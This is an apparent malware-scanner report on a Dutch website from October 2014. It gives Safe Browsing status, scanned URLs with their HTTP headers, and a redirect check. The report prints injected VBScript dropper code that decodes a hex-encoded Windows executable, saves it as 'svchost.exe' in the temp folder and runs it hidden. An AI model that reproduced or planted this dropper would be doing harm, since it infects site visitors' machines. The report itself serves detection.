Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hovenierdehaan.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hovenierdehaan.nl/ | 200 OK Content-Length: 300970 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000090000000375D0AB0C380F26B6B5650BD0FC9822FDC08FAFC7BA2EB2FBB151DDB8F2B2E6CCDD37049E9A08936CE517F00FCA7FE906750EBC71224D49333E261BFF3BEB7EF00000000000000000000000000000000504500004C0103008C8A45300000000000000000E0000F010B01070200300100007000000090030060BF040000A0030000D00400000040000010000000020000080004000800000004000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
https://googledrive.com/host/0B7X69YyzZu-IZjFKQ19VVi10RlE/tripleflap.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Thu, 09 Oct 2014 21:40:29 GMT Pragma: no-cache Location: https://904eb95420b2981c8598331c46bad5ba43c7c5f5.googledrive.com/host/0B7X69YyzZu-IZjFKQ19VVi10RlE/tripleflap.js Server: GSE Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, GData-Version, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, X-ClientDetails, X-GData-Client, X-GData-Key, X-Goog-AuthUser, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Experiments, x-goog-iam-role, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, X-Goog-Visitor-Id, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Origin, X-Referer, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp Access-Control-Allow-Methods: GET,OPTIONS Access-Control-Allow-Origin: * Alternate-Protocol: 443:quic,p=0.01 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
https://904eb95420b2981c8598331c46bad5ba43c7c5f5.googledrive.com/host/0b7x69yyzzu-izjfkq19vvi10rle/tripleflap.js | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Thu, 09 Oct 2014 21:40:29 GMT Pragma: no-cache Location: https://672faeba06e13c0f215e312dee204ee0c634d433-904eb95420b2981c8598331c46bad5ba43c7c5f5.googledrive.com/host/0b7x69yyzzu-izjfkq19vvi10rle/tripleflap.js Server: GSE Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, GData-Version, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, X-ClientDetails, X-GData-Client, X-GData-Key, X-Goog-AuthUser, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Experiments, x-goog-iam-role, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, X-Goog-Visitor-Id, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Origin, X-Referer, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp Access-Control-Allow-Methods: GET,OPTIONS Access-Control-Allow-Origin: * Alternate-Protocol: 443:quic,p=0.01 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
https://672faeba06e13c0f215e312dee204ee0c634d433-904eb95420b2981c8598331c46bad5ba43c7c5f5.googledrive.com/host/0b7x69yyzzu-izjfkq19vvi10rle/tripleflap.js | 500 Can't connect to 672faeba06e13c0f215e312dee204ee0c634d433-904eb95420b2981c8598331c46bad5ba43c7c5f5.googledrive.com:443 Content-Length: 262 Content-Type: text/plain | clean |
http://672faeba06e13c0f215e312dee204ee0c634d433-904eb95420b2981c8598331c46bad5ba43c7c5f5.googledrive.com/test404page.js | 500 Can't connect to 672faeba06e13c0f215e312dee204ee0c634d433-904eb95420b2981c8598331c46bad5ba43c7c5f5.googledrive.com:80 (Bad hostname) Content-Length: 326 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hovenierdehaan.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 21:40:26 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: hovenierdehaan.nl
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 21:40:26 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: hovenierdehaan.nl
Referer: http://www.google.com/search?q=hovenierdehaan.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hovenierdehaan.nl
Referer: http://www.google.com/search?q=hovenierdehaan.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.